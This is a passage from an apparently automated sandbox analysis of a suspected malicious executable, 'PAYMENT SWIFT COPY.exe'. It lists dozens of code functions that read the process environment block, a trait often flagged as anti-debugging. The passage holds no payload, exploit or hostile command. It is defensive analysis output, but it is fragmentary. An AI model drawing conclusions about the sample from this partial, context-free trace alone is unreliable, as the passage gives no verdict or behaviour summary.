                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190674D mov eax, dword ptr fs:[00000030h]8_2_0190674D
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D8770 mov eax, dword ptr fs:[00000030h]8_2_018D8770
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0770 mov eax, dword ptr fs:[00000030h]8_2_018E0770
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0770 mov eax, dword ptr fs:[00000030h]8_2_018E0770
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0770 mov eax, dword ptr fs:[00000030h]8_2_018E0770
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0770 mov eax, dword ptr fs:[00000030h]8_2_018E0770
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0770 mov eax, dword ptr fs:[00000030h]8_2_018E0770
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0770 mov eax, dword ptr fs:[00000030h]8_2_018E0770
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0770 mov eax, dword ptr fs:[00000030h]8_2_018E0770
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0770 mov eax, dword ptr fs:[00000030h]8_2_018E0770
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0770 mov eax, dword ptr fs:[00000030h]8_2_018E0770
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0770 mov eax, dword ptr fs:[00000030h]8_2_018E0770
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0770 mov eax, dword ptr fs:[00000030h]8_2_018E0770
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E0770 mov eax, dword ptr fs:[00000030h]8_2_018E0770
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D4690 mov eax, dword ptr fs:[00000030h]8_2_018D4690
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D4690 mov eax, dword ptr fs:[00000030h]8_2_018D4690
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019066B0 mov eax, dword ptr fs:[00000030h]8_2_019066B0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190C6A6 mov eax, dword ptr fs:[00000030h]8_2_0190C6A6
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190A6C7 mov ebx, dword ptr fs:[00000030h]8_2_0190A6C7
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190A6C7 mov eax, dword ptr fs:[00000030h]8_2_0190A6C7
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019506F1 mov eax, dword ptr fs:[00000030h]8_2_019506F1
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019506F1 mov eax, dword ptr fs:[00000030h]8_2_019506F1
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0194E6F2 mov eax, dword ptr fs:[00000030h]8_2_0194E6F2
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0194E6F2 mov eax, dword ptr fs:[00000030h]8_2_0194E6F2
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0194E6F2 mov eax, dword ptr fs:[00000030h]8_2_0194E6F2
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0194E6F2 mov eax, dword ptr fs:[00000030h]8_2_0194E6F2
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E260B mov eax, dword ptr fs:[00000030h]8_2_018E260B
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E260B mov eax, dword ptr fs:[00000030h]8_2_018E260B
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E260B mov eax, dword ptr fs:[00000030h]8_2_018E260B
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E260B mov eax, dword ptr fs:[00000030h]8_2_018E260B
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E260B mov eax, dword ptr fs:[00000030h]8_2_018E260B
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E260B mov eax, dword ptr fs:[00000030h]8_2_018E260B
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E260B mov eax, dword ptr fs:[00000030h]8_2_018E260B
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01912619 mov eax, dword ptr fs:[00000030h]8_2_01912619
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0194E609 mov eax, dword ptr fs:[00000030h]8_2_0194E609
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D262C mov eax, dword ptr fs:[00000030h]8_2_018D262C
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018EE627 mov eax, dword ptr fs:[00000030h]8_2_018EE627
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01906620 mov eax, dword ptr fs:[00000030h]8_2_01906620
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01908620 mov eax, dword ptr fs:[00000030h]8_2_01908620
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018EC640 mov eax, dword ptr fs:[00000030h]8_2_018EC640
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_01902674 mov eax, dword ptr fs:[00000030h]8_2_01902674
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190A660 mov eax, dword ptr fs:[00000030h]8_2_0190A660
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0190A660 mov eax, dword ptr fs:[00000030h]8_2_0190A660
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0199866E mov eax, dword ptr fs:[00000030h]8_2_0199866E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0199866E mov eax, dword ptr fs:[00000030h]8_2_0199866E
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D09AD mov eax, dword ptr fs:[00000030h]8_2_018D09AD
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018D09AD mov eax, dword ptr fs:[00000030h]8_2_018D09AD
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019589B3 mov esi, dword ptr fs:[00000030h]8_2_019589B3
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019589B3 mov eax, dword ptr fs:[00000030h]8_2_019589B3
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019589B3 mov eax, dword ptr fs:[00000030h]8_2_019589B3
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E29A0 mov eax, dword ptr fs:[00000030h]8_2_018E29A0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E29A0 mov eax, dword ptr fs:[00000030h]8_2_018E29A0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E29A0 mov eax, dword ptr fs:[00000030h]8_2_018E29A0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E29A0 mov eax, dword ptr fs:[00000030h]8_2_018E29A0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E29A0 mov eax, dword ptr fs:[00000030h]8_2_018E29A0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E29A0 mov eax, dword ptr fs:[00000030h]8_2_018E29A0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E29A0 mov eax, dword ptr fs:[00000030h]8_2_018E29A0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E29A0 mov eax, dword ptr fs:[00000030h]8_2_018E29A0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E29A0 mov eax, dword ptr fs:[00000030h]8_2_018E29A0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E29A0 mov eax, dword ptr fs:[00000030h]8_2_018E29A0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E29A0 mov eax, dword ptr fs:[00000030h]8_2_018E29A0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E29A0 mov eax, dword ptr fs:[00000030h]8_2_018E29A0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_018E29A0 mov eax, dword ptr fs:[00000030h]8_2_018E29A0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_019049D0 mov eax, dword ptr fs:[00000030h]8_2_019049D0
                Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exeCode function: 8_2_0199A9D3 mov eax, dword ptr fs:[00000030h]8_2_0199A9D3
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019669C0 mov eax, dword ptr fs:[00000030h] | 8_2_019669C0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018DA9D0 mov eax, dword ptr fs:[00000030h] | 8_2_018DA9D0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018DA9D0 mov eax, dword ptr fs:[00000030h] | 8_2_018DA9D0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018DA9D0 mov eax, dword ptr fs:[00000030h] | 8_2_018DA9D0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018DA9D0 mov eax, dword ptr fs:[00000030h] | 8_2_018DA9D0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018DA9D0 mov eax, dword ptr fs:[00000030h] | 8_2_018DA9D0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018DA9D0 mov eax, dword ptr fs:[00000030h] | 8_2_018DA9D0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019029F9 mov eax, dword ptr fs:[00000030h] | 8_2_019029F9
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019029F9 mov eax, dword ptr fs:[00000030h] | 8_2_019029F9
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0195E9E0 mov eax, dword ptr fs:[00000030h] | 8_2_0195E9E0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0195C912 mov eax, dword ptr fs:[00000030h] | 8_2_0195C912
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018C8918 mov eax, dword ptr fs:[00000030h] | 8_2_018C8918
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018C8918 mov eax, dword ptr fs:[00000030h] | 8_2_018C8918
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0194E908 mov eax, dword ptr fs:[00000030h] | 8_2_0194E908
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0194E908 mov eax, dword ptr fs:[00000030h] | 8_2_0194E908
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0196892B mov eax, dword ptr fs:[00000030h] | 8_2_0196892B
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0195892A mov eax, dword ptr fs:[00000030h] | 8_2_0195892A
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01950946 mov eax, dword ptr fs:[00000030h] | 8_2_01950946
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019A4940 mov eax, dword ptr fs:[00000030h] | 8_2_019A4940
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0195C97C mov eax, dword ptr fs:[00000030h] | 8_2_0195C97C
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018F6962 mov eax, dword ptr fs:[00000030h] | 8_2_018F6962
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018F6962 mov eax, dword ptr fs:[00000030h] | 8_2_018F6962
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018F6962 mov eax, dword ptr fs:[00000030h] | 8_2_018F6962
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01974978 mov eax, dword ptr fs:[00000030h] | 8_2_01974978
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01974978 mov eax, dword ptr fs:[00000030h] | 8_2_01974978
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0191096E mov eax, dword ptr fs:[00000030h] | 8_2_0191096E
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0191096E mov edx, dword ptr fs:[00000030h] | 8_2_0191096E
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0191096E mov eax, dword ptr fs:[00000030h] | 8_2_0191096E
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0195C89D mov eax, dword ptr fs:[00000030h] | 8_2_0195C89D
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018D0887 mov eax, dword ptr fs:[00000030h] | 8_2_018D0887
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018FE8C0 mov eax, dword ptr fs:[00000030h] | 8_2_018FE8C0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019A08C0 mov eax, dword ptr fs:[00000030h] | 8_2_019A08C0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0190C8F9 mov eax, dword ptr fs:[00000030h] | 8_2_0190C8F9
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0190C8F9 mov eax, dword ptr fs:[00000030h] | 8_2_0190C8F9
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0199A8E4 mov eax, dword ptr fs:[00000030h] | 8_2_0199A8E4
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0195C810 mov eax, dword ptr fs:[00000030h] | 8_2_0195C810
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0190A830 mov eax, dword ptr fs:[00000030h] | 8_2_0190A830
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0197483A mov eax, dword ptr fs:[00000030h] | 8_2_0197483A
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0197483A mov eax, dword ptr fs:[00000030h] | 8_2_0197483A
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018F2835 mov eax, dword ptr fs:[00000030h] | 8_2_018F2835
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018F2835 mov eax, dword ptr fs:[00000030h] | 8_2_018F2835
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018F2835 mov eax, dword ptr fs:[00000030h] | 8_2_018F2835
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018F2835 mov ecx, dword ptr fs:[00000030h] | 8_2_018F2835
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018F2835 mov eax, dword ptr fs:[00000030h] | 8_2_018F2835
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018F2835 mov eax, dword ptr fs:[00000030h] | 8_2_018F2835
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01900854 mov eax, dword ptr fs:[00000030h] | 8_2_01900854
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018E2840 mov ecx, dword ptr fs:[00000030h] | 8_2_018E2840
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018D4859 mov eax, dword ptr fs:[00000030h] | 8_2_018D4859
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018D4859 mov eax, dword ptr fs:[00000030h] | 8_2_018D4859
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01966870 mov eax, dword ptr fs:[00000030h] | 8_2_01966870
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01966870 mov eax, dword ptr fs:[00000030h] | 8_2_01966870
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0195E872 mov eax, dword ptr fs:[00000030h] | 8_2_0195E872
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0195E872 mov eax, dword ptr fs:[00000030h] | 8_2_0195E872
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01984BB0 mov eax, dword ptr fs:[00000030h] | 8_2_01984BB0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01984BB0 mov eax, dword ptr fs:[00000030h] | 8_2_01984BB0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018E0BBE mov eax, dword ptr fs:[00000030h] | 8_2_018E0BBE
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018E0BBE mov eax, dword ptr fs:[00000030h] | 8_2_018E0BBE
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018D0BCD mov eax, dword ptr fs:[00000030h] | 8_2_018D0BCD
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018D0BCD mov eax, dword ptr fs:[00000030h] | 8_2_018D0BCD
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018D0BCD mov eax, dword ptr fs:[00000030h] | 8_2_018D0BCD
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018F0BCB mov eax, dword ptr fs:[00000030h] | 8_2_018F0BCB
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018F0BCB mov eax, dword ptr fs:[00000030h] | 8_2_018F0BCB
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018F0BCB mov eax, dword ptr fs:[00000030h] | 8_2_018F0BCB
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0197EBD0 mov eax, dword ptr fs:[00000030h] | 8_2_0197EBD0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0195CBF0 mov eax, dword ptr fs:[00000030h] | 8_2_0195CBF0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018FEBFC mov eax, dword ptr fs:[00000030h] | 8_2_018FEBFC
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018D8BF0 mov eax, dword ptr fs:[00000030h] | 8_2_018D8BF0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018D8BF0 mov eax, dword ptr fs:[00000030h] | 8_2_018D8BF0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018D8BF0 mov eax, dword ptr fs:[00000030h] | 8_2_018D8BF0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0194EB1D mov eax, dword ptr fs:[00000030h] | 8_2_0194EB1D
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0194EB1D mov eax, dword ptr fs:[00000030h] | 8_2_0194EB1D
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0194EB1D mov eax, dword ptr fs:[00000030h] | 8_2_0194EB1D
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0194EB1D mov eax, dword ptr fs:[00000030h] | 8_2_0194EB1D
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0194EB1D mov eax, dword ptr fs:[00000030h] | 8_2_0194EB1D
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0194EB1D mov eax, dword ptr fs:[00000030h] | 8_2_0194EB1D
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0194EB1D mov eax, dword ptr fs:[00000030h] | 8_2_0194EB1D
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0194EB1D mov eax, dword ptr fs:[00000030h] | 8_2_0194EB1D
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0194EB1D mov eax, dword ptr fs:[00000030h] | 8_2_0194EB1D
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019A4B00 mov eax, dword ptr fs:[00000030h] | 8_2_019A4B00
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018FEB20 mov eax, dword ptr fs:[00000030h] | 8_2_018FEB20
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018FEB20 mov eax, dword ptr fs:[00000030h] | 8_2_018FEB20
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01998B28 mov eax, dword ptr fs:[00000030h] | 8_2_01998B28
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01998B28 mov eax, dword ptr fs:[00000030h] | 8_2_01998B28
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0197EB50 mov eax, dword ptr fs:[00000030h] | 8_2_0197EB50
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019A2B57 mov eax, dword ptr fs:[00000030h] | 8_2_019A2B57
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019A2B57 mov eax, dword ptr fs:[00000030h] | 8_2_019A2B57
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019A2B57 mov eax, dword ptr fs:[00000030h] | 8_2_019A2B57
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019A2B57 mov eax, dword ptr fs:[00000030h] | 8_2_019A2B57
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01984B4B mov eax, dword ptr fs:[00000030h] | 8_2_01984B4B
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01984B4B mov eax, dword ptr fs:[00000030h] | 8_2_01984B4B
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01978B42 mov eax, dword ptr fs:[00000030h] | 8_2_01978B42
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01966B40 mov eax, dword ptr fs:[00000030h] | 8_2_01966B40
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01966B40 mov eax, dword ptr fs:[00000030h] | 8_2_01966B40
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0199AB40 mov eax, dword ptr fs:[00000030h] | 8_2_0199AB40
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018C8B50 mov eax, dword ptr fs:[00000030h] | 8_2_018C8B50
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018CCB7E mov eax, dword ptr fs:[00000030h] | 8_2_018CCB7E
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01908A90 mov edx, dword ptr fs:[00000030h] | 8_2_01908A90
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018DEA80 mov eax, dword ptr fs:[00000030h] | 8_2_018DEA80
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018DEA80 mov eax, dword ptr fs:[00000030h] | 8_2_018DEA80
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018DEA80 mov eax, dword ptr fs:[00000030h] | 8_2_018DEA80
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018DEA80 mov eax, dword ptr fs:[00000030h] | 8_2_018DEA80
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018DEA80 mov eax, dword ptr fs:[00000030h] | 8_2_018DEA80
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018DEA80 mov eax, dword ptr fs:[00000030h] | 8_2_018DEA80
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018DEA80 mov eax, dword ptr fs:[00000030h] | 8_2_018DEA80
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018DEA80 mov eax, dword ptr fs:[00000030h] | 8_2_018DEA80
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018DEA80 mov eax, dword ptr fs:[00000030h] | 8_2_018DEA80
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_019A4A80 mov eax, dword ptr fs:[00000030h] | 8_2_019A4A80
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018D8AA0 mov eax, dword ptr fs:[00000030h] | 8_2_018D8AA0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018D8AA0 mov eax, dword ptr fs:[00000030h] | 8_2_018D8AA0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01926AA4 mov eax, dword ptr fs:[00000030h] | 8_2_01926AA4
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01904AD0 mov eax, dword ptr fs:[00000030h] | 8_2_01904AD0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01904AD0 mov eax, dword ptr fs:[00000030h] | 8_2_01904AD0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018D0AD0 mov eax, dword ptr fs:[00000030h] | 8_2_018D0AD0
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01926ACC mov eax, dword ptr fs:[00000030h] | 8_2_01926ACC
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01926ACC mov eax, dword ptr fs:[00000030h] | 8_2_01926ACC
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_01926ACC mov eax, dword ptr fs:[00000030h] | 8_2_01926ACC
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0190AAEE mov eax, dword ptr fs:[00000030h] | 8_2_0190AAEE
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0190AAEE mov eax, dword ptr fs:[00000030h] | 8_2_0190AAEE
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0195CA11 mov eax, dword ptr fs:[00000030h] | 8_2_0195CA11
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018FEA2E mov eax, dword ptr fs:[00000030h] | 8_2_018FEA2E
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_0190CA24 mov eax, dword ptr fs:[00000030h] | 8_2_0190CA24
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018F4A35 mov eax, dword ptr fs:[00000030h] | 8_2_018F4A35
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018F4A35 mov eax, dword ptr fs:[00000030h] | 8_2_018F4A35
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018E0A5B mov eax, dword ptr fs:[00000030h] | 8_2_018E0A5B
Source: C:\Users\user\Desktop\PAYMENT SWIFT COPY.exe | Code function: 8_2_018E0A5B mov eax, dword ptr fs:[00000030h] | 8_2_018E0A5B
